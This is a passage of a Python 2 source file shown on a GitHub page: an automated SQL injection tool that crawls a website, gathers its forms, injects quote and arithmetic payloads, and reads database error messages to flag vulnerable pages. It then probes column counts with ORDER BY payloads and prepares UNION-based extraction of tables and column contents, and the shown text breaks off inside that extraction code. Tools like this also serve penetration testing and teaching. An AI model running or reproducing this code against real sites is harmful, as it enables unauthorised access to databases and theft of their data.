-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathfunxs.py
More file actions
1246 lines (1201 loc) · 76.2 KB
/
funxs.py
File metadata and controls
1246 lines (1201 loc) · 76.2 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
import datetime
import urllib
import urlparse
import requests
import sys
import cgi
from BeautifulSoup import *
import time
# VARIABLES
wrn = "[WARNING]"
inf = "[INFO]"
# Colors for print
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
# Function that return the exact date n time
def tm():
return "["+datetime.datetime.now().time().strftime('%H:%M:%S')+"]"
# Scrapping the entire WebSite
def crawler(url, quick):
urls = [url] # A list that all the links are going to be held initialized with the original url
visited = [url] # A list that keeps all the visited links
incl_url = url.split("/")[2] # A basic snippet of the original url tha must be included to all the links
prev_url = list() # A list that keeps the double links if Quick scan selected
# For all the links of the web page
print "Scraping...\n"
while len(urls) > 0:
try:
html = urllib.urlopen(urls[0]).read()
except:
urls.pop(0) # Removes the old urls
# print "Is not stable."
continue
soup = BeautifulSoup(html)
urls.pop(0) # Removes the old urls
links = soup('a', href=True)
for link in links:
new_page = urlparse.urljoin(url, link.get('href', None)) # Join the original url with the new link
# print new_page # Debugging
if incl_url in new_page and new_page not in visited:
if quick:
if "?" in new_page and new_page[:new_page.rfind('?')] in prev_url: # Avoid double checking the same URL
continue
if "?" in new_page and new_page[:new_page.rfind('?')] not in prev_url: # Avoid double checking the same URL
prev_url.append(new_page[:new_page.rfind('?')])
urls.append(new_page)
visited.append(new_page)
# print "visited", visited # Debugging
return visited
# 1. Finds and returns all the links that contain Forms
def find_forms(given_links, show_messages):
form_list = {} # A list with links that contain forms
prev_url = list() # Avoid double checking the same URL
prev_fdetails = list() # Avoid double checking the same URL
c_name = list() # Cookie names
c_value = list() # Cookie values
print "Press Enter to continue without cookie"
cookies = (raw_input('Enter cookies: ')).strip() # Entering the cookies
print ""
c_split = cookies.split(" ")
for c in c_split: # Making a dict with the cookies
c_name.append(c[:c.find('=')])
c_value.append(c[c.find('=')+1:])
cookies_dict = dict(zip(c_name, c_value))
del c_name[:] # Empties the old cookies
del c_value[:]
for url in given_links:
move_tonext1 = False # Avoid double checking the same URL
move_tonext2 = False # Avoid double checking the same URL
if "?" in url and url[:url.rfind('?')] in prev_url: # Avoid double checking the same URL
continue
if "?" in url and url[:url.rfind('?')] not in prev_url: # Avoid double checking the same URL
prev_url.append(url[:url.rfind('?')])
if show_messages:
print tm(), inf, "Connecting to the URL..."
try:
# Without Cookies
if cookies == "": # Checking if there are cookies or not
html = urllib.urlopen(url).read()
soup = BeautifulSoup(html)
# With Cookies
else:
html = requests.get(url, cookies=cookies_dict).text
soup = BeautifulSoup(html)
if show_messages:
print tm(), inf, "Target URL is stable..."
print "..........\n.........."
except:
print tm(), wrn, "Target URL is not stable!!!"
print tm(), wrn, "Make sure you are connected to the internet.\n"
variables = list() # Keeps the injected code (URL parameters).
slash = 0 # Checking how many '/' are in the URL.
data = "" # Contains the parameters (payload) (e.g, 24)
f_num = 0 # Counts the number of the forms.
# FORMS
try:
if soup('form'):
print "URL with Form:", url
# print soup('form') # Debugging
for frm in soup('form'):
# Progress messages.
f_num += 1
try:
f_name = frm['name']
except:
f_name = "-"
try:
f_method = frm['method'].upper()
except:
f_method = "GET"
try:
f_action = frm['action']
if f_action == "#": f_action = "" # To evala gia to DVWA (Den xero an prokalei provlmata)
except:
f_action = url
for prev_nameact in prev_fdetails: # Avoid double checking the same URL
if prev_nameact == f_name+":"+f_action: # Checking if the Form name and action are used
move_tonext1 = True
break
if move_tonext1: # Avoid double checking the same URL
move_tonext2 = True
break
prev_fdetails.append(f_name+":"+f_action) # Updating with previous form details
if show_messages:
print tm(), inf, "Searching for Forms..."
print "=================================================="
print "Form", f_num
print "=================================================="
print tm(), inf, "Checking Form..."
print tm(), inf, "Form name: '" + f_name + "'..."
print tm(), inf, "Request method used:", "'" + f_method + "'..."
# Checking for the proper type of input
for tag in frm('input'):
if tag['type'] == "submit":
try:
sub_name = tag['name']
sub_value = tag['value']
except:
sub_name = ""
sub_value = ""
if tag['type'] == "text" or \
tag['type'] == "password" or \
tag['type'] == "email" or \
tag['type'] == "number" or \
tag['type'] == "search" or \
tag['type'] == "tel" or \
tag['type'] == "url":
variables.append(tag['name']) # Gets the name of the input
if show_messages:
print tm(), inf, "Input type:", "'" + tag['type'] + "'..."
# Checking the "Select - Option" tags
for tag in frm('select'):
variables.append(tag['name']) # Gets the name of the input
# Action fix
if f_action[-1:] == "/": # Removes the last /
rem_slash = f_action[::-1].replace("/", "", 1)[::-1]
if "/" in rem_slash: # Keeps the word after the last /
act = rem_slash[:rem_slash.rfind('/'):-1][::-1]
else: # Keeps the word only since no / contained
act = rem_slash
elif "/" in f_action: # Keeps the word after the last /
act = f_action[:f_action.rfind('/'):-1][::-1]
else: # Keeps the word only since no / contained
act = f_action
if show_messages:
print tm(), inf, "Action:", "'" + act + "'..."
# URL fix
for char in url: # Counts the /
if char == "/":
slash += 1
if slash < 3: # If there are only the 2 slashes of "http//", add a / in the end of the URL
url += "/"
# For comparison with the Action
temp_url = url[url.find('/') + 2::1]
temp_url = temp_url.strip()
if temp_url.endswith('/'):
temp_url = temp_url[::-1].replace("/", "", 1)[::-1]
# For comparison with the URL
temp_act = act
temp_act = temp_act.strip()
if temp_act.endswith('/'):
temp_act = temp_act[::-1].replace("/", "", 1)[::-1]
if temp_url == temp_act:
url = url[:url.rfind('/')]
else:
url = url[:url.rfind('/') + 1] + act
if show_messages:
print tm(), inf, "New URL:", url
# Appending parameters to the URL
if show_messages:
print tm(), inf, "Forming the new URL..."
for var in variables: data = data + var + "=2&"
data = data[::-1].replace("&", "", 1)[::-1]
if "?" in url:
new_page = url + "&" + data
else:
new_page = url + "?" + data
if show_messages:
print tm(), inf, "Formed URL:", new_page
if sub_name != "": # If tag name isn't empty then the string "$@#%" is appended
new_page = new_page+"$@%#"+"&"+sub_name+"="+sub_value
form_list.update({new_page: f_method})
# Reinitialization
del variables[:]
data = ""
if show_messages:
print "\n"
if move_tonext2:
continue
except:
pass
return form_list
# 2. Creates and returns the new links which arising out of the forms
# It used only for Forms (for the moment)
def find_sql_vul(vuln_pages):
vuln_links = {} # A list with vulnerable links
vul_found = False # Checks if vulnerability has been found
count = 0 # A flag that indicates either to show the number of the form or not
c_name = list() # Cookie names
c_value = list() # Cookies values
d_name = list() # Data names
d_value = list() # Data values
errors = {
'MySQL': 'error in your SQL syntax',
'SQLi_err': 'access shop category information',
'MySQL_Valid_Argument': 'Supplied argument is not a valid MySQL result resource in',
'MySQL_fetch': 'mysql_fetch_assoc()',
'MySQL_array': 'mysql_fetch_array()',
'MySQL_result': 'mysql_free_result()',
'MySQL_start': 'session_start()',
'MYSQL': 'getimagesize()',
'MySQL_call': 'Call to a member function',
'Oracle1': 'Microsoft OLE DB Provider for Oracle',
'Mysql_re': 'Warning: require()',
'MysQl_11': 'array_merge()',
'MySQLi': 'mysql_query()',
'Oracle': 'ORA-01756',
'MiscError': 'SQL Error',
'MiscError2': 'mysql_fetch_row',
'MiscError3': 'num_rows',
'JDBC_CFM': 'Error Executing Database Query',
'JDBC_CFM2': 'SQLServer JDBC Driver',
'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',
'MSSQL_Uqm': 'Unclosed quotation mark',
'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
'Postgrey_error': 'An error occurred',
'SQL_errore': 'Unknown Column',
'MS-Access_JETdb': 'Microsoft JET Database'
}
print "Press Enter to continue without cookie"
cookies = (raw_input('Enter cookies: ')).strip() # Entering the cookies
print ""
c_split = cookies.split(" ")
for c in c_split: # Making a dict with the cookies
c_name.append(c[:c.find('=')])
c_value.append(c[c.find('=')+1:])
cookies_dict = dict(zip(c_name, c_value))
del c_name[:] # Empties the old cookies
del c_value[:]
for url, method in vuln_pages.items():
count += 1
if count > 1: print "\n"
print "=================================================="
print "Form", count
print "=================================================="
q = "'"
if "$@%#" in url:
new_page = url.replace("$@%#", q)
else:
new_page = url + q
try:
print tm(), inf, "Connecting to the URL..."
if cookies == "": # Without Cookies # Checking if there are cookies or not
# print "NO COOKIES (ERROR BASED)" # DEBUGGING
if method == "POST": # POST Method # Checking if the method is POST or GET
# print "METHOD POST (ERROR BASED)" # DEBUGGING
pure_url = url[:url.rfind("?")] # Extracting the original URL
data_list = new_page[new_page.rfind("?")+1:].split("&")
for dl in data_list: # Making a dictionary with data for the post request
d_name.append(dl[:dl.find('=')])
d_value.append(dl[dl.find('=')+1:])
data_dict = dict(zip(d_name, d_value))
del d_name[:] # Empties the old data
del d_value[:]
html = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text # POST Request
else: # GET Method
# print "METHOD GET (ERROR BASED)" # DEBUGGING
html = urllib.urlopen(new_page).read()
else: # With Cookies
# print "WITH COOKIES (ERROR BASED)" # DEBUGGING
if method == "POST": # POST Method # Checking if the method is POST or GET
# print "METHOD POST (ERROR BASED)" # DEBUGGING
pure_url = url[:url.rfind("?")] # Extracting the original URL
data_list = new_page[new_page.rfind("?")+1:].split("&")
for dl in data_list: # Making a dictionary with data for the post request
d_name.append(dl[:dl.find('=')])
d_value.append(dl[dl.find('=')+1:])
data_dict = dict(zip(d_name, d_value))
del d_name[:] # Empties the old data
del d_value[:]
html = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text # POST Request
else: # GET Method
# print "METHOD GET (ERROR BASED)" # DEBUGGING
html = requests.get(new_page, cookies=cookies_dict).text # GET Request
print tm(), inf, "Target URL is stable..."
print "..........\n.........."
print tm(), inf, "Injecting malicious code into the URL..."
print tm(), inf, "Injected URL:", new_page
print tm(), inf, "Testing for SQL injection..."
# Trying error messages.
for key, value in errors.items():
if re.search(value, html):
print "\n", tm(), inf, "SQL injection is possible!"
print tm(), inf, "Error type:", key
print tm(), inf, "Injection type: error-based"
vuln_links.update({url: method})
vul_found = True
break
else:
print tm(), inf, "Trying ", key+"..."
except:
print tm(), wrn, "Target URL is not stable!!!"
print tm(), wrn, "Make sure you are connected to the internet.\n"
# Second check - Checks if Quotes and Apostrophes are filtered (payload is a mathematical expression)
if not vul_found:
if "$@%#" in url:
temp_before = url[:url.find('$@%#')]
temp_after = url[url.find('$@%#'):]
int_check = temp_before[temp_before.rfind('=')+1:]
else:
int_check = url[url.rfind('=')+1:]
temp_after = ""
if int_check.isdigit():
int_check = int(int_check) + 1
if cookies == "":
# print "NO COOKIES (BLIND)" # DEBUGGING
if method == "POST":
# print "METHOD POST" # DEBUGGING
data_list = url.replace("$@%#", "")[url.rfind("?")+1:].split("&")
for dl in data_list: # Making a dictionary with data for the post request
d_name.append(dl[:dl.find('=')])
d_value.append(dl[dl.find('=')+1:])
data_dict = dict(zip(d_name, d_value))
del d_name[:] # Empties the old data
del d_value[:]
html = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text # POST Request
else:
# print "METHOD GET" # DEBUGGING
html = urllib.urlopen(url.replace("$@%#", "")).read() # URL as it is
if "$@%#" in url:
tampered_url = url.replace(url[url.find('$@%#')-1:], int_check.__str__() + "-1")
temp_after = temp_after.replace('$@%#', "")
if method == "POST":
# print "METHOD POST" # DEBUGGING
data_list = (tampered_url + temp_after)[url.rfind("?")+1:].split("&")
for dl in data_list: # Making a dictionary with data for the post request
d_name.append(dl[:dl.find('=')])
d_value.append(dl[dl.find('=')+1:])
data_dict = dict(zip(d_name, d_value))
del d_name[:] # Empties the old data
del d_value[:]
html_compare = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text # POST Request
else:
# print "METHOD GET" # DEBUGGING
html_compare = urllib.urlopen(tampered_url + temp_after).read() # URL with payload
# print url.replace("$@%#", "") # DEBUGGING
# print tampered_url + temp_after # DEBUGGING
else:
tampered_url = url.replace(url[url.rfind('=')+1:], "") + int_check.__str__() + "-1"
if method == "POST":
# print "METHOD POST" # DEBUGGING
data_list = tampered_url[url.rfind("?")+1:].split("&")
for dl in data_list: # Making a dictionary with data for the post request
d_name.append(dl[:dl.find('=')])
d_value.append(dl[dl.find('=')+1:])
data_dict = dict(zip(d_name, d_value))
del d_name[:] # Empties the old data
del d_value[:]
html_compare = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text # POST Request
else:
# print "METHOD GET" # DEBUGGING
html_compare = urllib.urlopen(tampered_url).read() # URL with payload
# print url.replace("$@%#", "") # DEBUGGING
# print tampered_url # DEBUGGING
else:
if method == "POST":
# print "METHOD POST" # DEBUGGING
data_list = url.replace("$@%#", "")[url.rfind("?")+1:].split("&")
for dl in data_list: # Making a dictionary with data for the post request
d_name.append(dl[:dl.find('=')])
d_value.append(dl[dl.find('=')+1:])
data_dict = dict(zip(d_name, d_value))
del d_name[:] # Empties the old data
del d_value[:]
html = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text # POST Request
else:
# print "METHOD GET" # DEBUGGING
html = requests.get(url.replace("$@%#", ""), cookies=cookies_dict).text # URL as it is
if "$@%#" in url:
tampered_url = url.replace(url[url.find('$@%#')-1:], int_check.__str__() + "-1")
temp_after = temp_after.replace('$@%#', "")
if method == "POST":
# print "METHOD POST" # DEBUGGING
data_list = (tampered_url + temp_after)[url.rfind("?")+1:].split("&")
for dl in data_list: # Making a dictionary with data for the post request
d_name.append(dl[:dl.find('=')])
d_value.append(dl[dl.find('=')+1:])
data_dict = dict(zip(d_name, d_value))
del d_name[:] # Empties the old data
del d_value[:]
html_compare = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text # POST Request
else:
# print "METHOD GET" # DEBUGGING
html_compare = requests.get(tampered_url + temp_after, cookies=cookies_dict).text # URL with payload
# print url.replace("$@%#", "") # DEBUGGING
# print tampered_url + temp_after # DEBUGGING
else:
tampered_url = url.replace(url[url.rfind('=')+1:], "") + int_check.__str__() + "-1"
if method == "POST":
# print "METHOD POST" # DEBUGGING
data_list = tampered_url[url.rfind("?")+1:].split("&")
for dl in data_list: # Making a dictionary with data for the post request
d_name.append(dl[:dl.find('=')])
d_value.append(dl[dl.find('=')+1:])
data_dict = dict(zip(d_name, d_value))
del d_name[:] # Empties the old data
del d_value[:]
html_compare = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text # POST Request
else:
# print "METHOD GET" # DEBUGGING
html_compare = requests.get(tampered_url, cookies=cookies_dict).text # URL with payload
# print url.replace("$@%#", "") # DEBUGGING
# print tampered_url # DEBUGGING
if html == html_compare: # Checking pages for differences (If no differences)
print ""
print tm(), wrn, "Seems like apostrophes and quotation marks are screened with backslashes."
print tm(), inf, "Trying another method."
print tm(), inf, "Original URL:", url.replace("$@%#", "")
print tm(), inf, "Injected URL:", tampered_url + temp_after
# print html # DEBUGGING
# print html_compare # DEBUGGING
print "\n", tm(), inf, "SQL injection is possible!"
print tm(), inf, "Error type: disabled"
print tm(), inf, "Injection type: blind"
vuln_links.update({url: method})
else: # If there is a difference
print ""
# print html # DEBUGGING
# print html_compare # DEBUGGING
print tm(), inf, "SQL Injection is not possible"
vul_found = False
return vuln_links
# 3. Scans and displays all the information extracted from the DataBase
def find_db_info(vuln_links):
count = 0
for vul_page, method in vuln_links.items():
skata = "" # For testing and only
form_mode = False
scan_db = False # For continue scanning database
par_break = False
cont_union = False # For continue with union technique
search_columns = False # You can choose rather to search for information or not
result_limit = False # You can choose rather to limit results by 10 or not
sp = "" # Setting up a way to put spaces
column_num = 0 # Initializing column number
clmn_list = "1" # Initializing column list
db_payload1 = "version()" # Payload 1 for database version
db_payload2 = "" # Payload 2 for database version
should_restart = True # Start the loop from the beginning
payload_counter = 0 # Counter for choosing the payload to put each time
tbl_limit = 1 # Increasing the limit to find more tables
clmn_limit = 1 # Increasing the limit to find more columns
clinfo_limit = 1 # Increasing the limit to find more information
tbl_num = 1 # Increasing the limit to find more columns
tbl_out1 = 0 # Flag for getting out of a specific loop
tbl_out2 = 0 # Flag for getting out of a specific loop
clmn_out1 = 0 # Flag for getting out of a specific loop
clmn_out2 = 0 # Flag for getting out of a specific loop
clinfo_out1 = 0 # Flag for getting out of a specific loop
clinfo_out2 = 0 # Flag for getting out of a specific loop
num = 1 # Iterating between tables
rem_clmn = 0 # A number that defines the columns to be removed
concat_string = "" # String appended with table's columns for the concat query
tbl_changed1 = True # When true, the table changes
tbl_changed2 = False # When true, the table changes
first_info = list() # List with the first three info
tables = list() # List with tables
columns = list() # List with columns (nomizo i diafora me to apokato einai oti afto xrisimopoieite gia na emfanistoun sosta sto telos)
columns_forinfo = list() # List with columns (eno afto prepei na einai gia na ginei i douleia sta information, dld na vrethoun)
column_info = list() # List with the columns information
fake_diff = False # Getting inside the if statement without having found any difference
c_name = list() # Cookie names
c_value = list() # Cookie values
d_name = list() # Data names
d_value = list() # Data values
words = [] # Stores the different word. It is used so it can change tha table/column if a message displayed instead of nothing (fake diff alternative)
same_word = False # Flag that indicates that a message is displayed (e.g, Invalid Input parameter)
tbl_del = 0 # Flag that allows to remove the last table for the list (e.g, Invalid Input parameter)
last_clmn_remove = False # Flag to remove the last column from the list, if there is a message like (Invalid Input parameter)
count += 1
if count > 1: print "\n\nYou can continue scanning the", count, "link"
if "$@%#" in vul_page:
form_mode = True
# Choose to scan the DB for info
while True:
print "\n\n1. Scan for database"
print "2. Exit"
ch = raw_input("")
print ""
if ch == "1":
scan_db = True
break
if ch == "2":
exit()
break
# Spaces preferences
while True:
print "\nSet a way of spacing"
print "1. +"
print "2. /**/"
ch = raw_input("")
print ""
if ch == "1":
sp = "+"
break
if ch == "2":
sp = "/**/"
break
# Limit preferences
while True:
print "\nSet a limit start point"
print "1. limit 0,1 --"
print "2. limit 1,1 --"
ch = raw_input("")
print ""
if ch == "1":
tbl_limit = 0
clmn_limit = 0
clinfo_limit = 0
set_tbl_lmt = 0 # initiates the table limit inside the loop
set_clmn_lmt = 0 # initiates the column limit inside the loop
set_clinfo_lmt = 0 # initiates the column info limit inside the loop
break
if ch == "2":
tbl_limit = 1
clmn_limit = 1
clinfo_limit = 1
set_tbl_lmt = 1 # initiates the table limit inside the loop
set_clmn_lmt = 1 # initiates the column limit inside the loop
set_clinfo_lmt = 1 # initiates the column info limit inside the loop
break
# Checks for string based injection (If it's a number but not an int, it's considered as an int and it doesn't works)
if form_mode:
if vul_page.count("=") > 1:
temp_vul_page = vul_page[:vul_page.find('$@%#')]
string_check = temp_vul_page[temp_vul_page.rfind('=')+1:]
# print "Form Mode with more than one =", string_check # Debugging
else:
string_check = vul_page[vul_page.rfind('=')+1:]
# print "Form Mode with one =", string_check # Debugging
else:
string_check = vul_page[vul_page.rfind('=')+1:]
# print "Not Form Mode", string_check # Debugging
if not string_check.isdigit():
if form_mode:
vul_page = vul_page.replace("$@%#", "'$@%#")
else:
vul_page += "'"
plus = sp + "-"
else:
plus = ""
print ""
print "Press Enter to continue without cookie"
cookies = (raw_input('Enter cookies: ')).strip()
c_split = cookies.split(" ")
for c in c_split:
c_name.append(c[:c.find('=')])
c_value.append(c[c.find('=')+1:])
cookies_dict = dict(zip(c_name, c_value))
del c_name[:]
del c_value[:]
# Scanning DB for average columns using ORDER BY clause
if scan_db:
# 1) Order by (default)
print tm(), inf, "ORDER BY technique seems to be usable"
proggress = "["+datetime.datetime.now().time().strftime('%H:%M:%S')+"] [ - ] searching..." # Graphic progress.
par = ""
for par_num in range(1, 6): # Checking for parentheses and how many
for column in range(1, 50): # Scanning for 50 columns with a payload (without the --)
sys.stdout.write(proggress+".") # Graphic progress.
ord_by_err_glassfish = "Unknown column '"+column.__str__()+"' in 'order clause'"
ord_by_err = "Unknown column '"+column.__str__()+"' in 'order clause'"
ord_by_err2 = "mysql_fetch_array()"
if form_mode:
db_url = vul_page.replace("$@%#", par + sp + "order" + sp + "by" + sp + column.__str__() + "--" + plus) # Order by Payload
# print "Form mode enabled", db_url # Debugging
else:
db_url = vul_page + par + sp + "order" + sp + "by" + sp + column.__str__() + "--" + plus # Order by Payload
# print "Form mode disabled", db_url # Debugging
try:
if cookies == "":
# print "NO COOKIES" # DEBUGGING
if method == "POST": # POST Method # Checking if the method is POST or GET
# print "METHOD POST" # DEBUGGING
pure_url = vul_page[:vul_page.rfind("?")] # Extracting the original URL
data_list = db_url[db_url.rfind("?")+1:].split("&")
for dl in data_list: # Making a dictionary with data for the post request
d_name.append(dl[:dl.find('=')])
d_value.append(dl[dl.find('=')+1:])
data_dict = dict(zip(d_name, d_value))
del d_name[:] # Empties the old data
del d_value[:]
db_html = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text # POST Request
else:
# print "METHOD GET" # DEBUGGING
db_html = urllib.urlopen(db_url).read()
else:
# print "WITH COOKIES" # DEBUGGING
if method == "POST": # POST Method # Checking if the method is POST or GET
# print "METHOD POST" # DEBUGGING
pure_url = vul_page[:vul_page.rfind("?")] # Extracting the original URL
data_list = db_url[db_url.rfind("?")+1:].split("&")
for dl in data_list: # Making a dictionary with data for the post request
d_name.append(dl[:dl.find('=')])
d_value.append(dl[dl.find('=')+1:])
data_dict = dict(zip(d_name, d_value))
del d_name[:] # Empties the old data
del d_value[:]
db_html = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text # POST Request
else:
db_html = requests.get(db_url, cookies=cookies_dict).text
except:
print tm(), wrn, "Injected URL is not stable!!!"
print tm(), wrn, "Please make sure you are connected to the internet and try again"
break
if re.search(ord_by_err, db_html) or re.search(ord_by_err_glassfish, db_html) or re.search(ord_by_err2, db_html):
column_num = column - 1 # Setting the number of the columns that have been found
# print "Aaaaaaaaaaaaaaaaaaaa", column_num # Debugging
par_break = True
break
proggress = ""
if par_break: break # Breaking the loop when the used number of parentheses found
par += ")" # Increasing the number of parentheses
plus = sp + "-" # Appending the minus at the end (Needed when parentheses are opened)
print ""
if column_num == 0:
print tm(), inf, "Unable to find the number of the columns"
while True:
ch = raw_input("Do you want to perform a String Based Attack? [y/N]: ")
if ch == "y" or ch == "Y":
str_based = True
if form_mode:
vul_page = vul_page.replace("$@%#", "'$@%#")
else:
vul_page += "'"
plus = sp + "-"
break
if ch == "N" or ch == "n":
exit()
else:
print tm(), inf, "The target URL appears to have", column_num, "column(s) in query"
str_based = False
# 2) Order by (String Based)
if str_based:
proggress = "["+datetime.datetime.now().time().strftime('%H:%M:%S')+"] [ - ] searching..." # Graphic progress.
par = ""
for par_num in range(1, 6): # Checking for parentheses and how many
for column in range(1, 50): # Scanning for 50 columns with a payload (without the --)
sys.stdout.write(proggress+".") # Graphic progress.
ord_by_err_glassfish = "Unknown column '"+column.__str__()+"' in 'order clause'"
ord_by_err = "Unknown column '"+column.__str__()+"' in 'order clause'"
ord_by_err2 = "mysql_fetch_array()"
if form_mode:
db_url = vul_page.replace("$@%#", par + sp + "order" + sp + "by" + sp + column.__str__() + "--" + plus) # Order by Payload
# print "Form mode enabled", db_url # Debugging
else:
db_url = vul_page + par + sp + "order" + sp + "by" + sp + column.__str__() + "--" + plus # Order by Payload
# print "Form mode disabled", db_url # Debugging
try:
if cookies == "":
# print "NO COOKIES" # DEBUGGING
if method == "POST": # POST Method # Checking if the method is POST or GET
# print "METHOD POST" # DEBUGGING
pure_url = vul_page[:vul_page.rfind("?")] # Extracting the original URL
data_list = db_url[db_url.rfind("?")+1:].split("&")
for dl in data_list: # Making a dictionary with data for the post request
d_name.append(dl[:dl.find('=')])
d_value.append(dl[dl.find('=')+1:])
data_dict = dict(zip(d_name, d_value))
del d_name[:] # Empties the old data
del d_value[:]
db_html = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text # POST Request
else:
# print "METHOD GET" # DEBUGGING
db_html = urllib.urlopen(db_url).read()
else:
# print "WITH COOKIES (ERROR BASED)" # DEBUGGING
if method == "POST": # POST Method # Checking if the method is POST or GET
# print "METHOD POST (ERROR BASED)" # DEBUGGING
pure_url = vul_page[:vul_page.rfind("?")] # Extracting the original URL
data_list = db_url[db_url.rfind("?")+1:].split("&")
for dl in data_list: # Making a dictionary with data for the post request
d_name.append(dl[:dl.find('=')])
d_value.append(dl[dl.find('=')+1:])
data_dict = dict(zip(d_name, d_value))
del d_name[:] # Empties the old data
del d_value[:]
db_html = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text # POST Request
else:
db_html = requests.get(db_url, cookies=cookies_dict).text
except:
print ""
print tm(), wrn, "Injected URL is not stable!!!"
print tm(), wrn, "Please make sure you are connected to the internet and try again"
break
if re.search(ord_by_err, db_html) or re.search(ord_by_err_glassfish, db_html) or re.search(ord_by_err2, db_html):
column_num = column - 1 # Setting the number of the columns that have been found
# print "Bbbbbbbbbbbbbbbb", column_num # Debugging
par_break = True
break
proggress = ""
if par_break: break # Breaking the loop when the used number of parentheses found
par += ")" # Increasing the number of parentheses
plus = sp + "-" # Appending the minus at the end (Needed when parentheses are opened)
print ""
if column_num == 0:
print tm(), inf, "Unable to find the number of the columns"
exit()
else:
print tm(), inf, "The target URL appears to have", column_num, "column(s) in query"
# Choose to do Union all technique or exit.
while True:
ch = raw_input("UNION technique seems to be usable. Do you want to continue? [y/N]: ")
if ch == "y" or ch == "Y":
cont_union = True
break
if ch == "N" or ch == "n":
exit()
break
# Choose to search the columns for information or not.
while True:
ch = raw_input("Do you want to search the columns for information? [y/N]: ")
if ch == "y" or ch == "Y":
search_columns = True
break
if ch == "N" or ch == "n":
search_columns = False
break
# Choose to put a limit in the first 10 results or not.
if search_columns:
while True:
ch = raw_input("Do you want to limit the results for each column by 3? [y/N]: ")
if ch == "y" or ch == "Y":
result_limit = True
break
if ch == "N" or ch == "n":
result_limit = False
break
# Finding Database information (UNION BASED)
# NO /*!00000.....*/ BYPASS METHOD!!!
if cont_union:
if form_mode:
if vul_page.count("=") > 1:
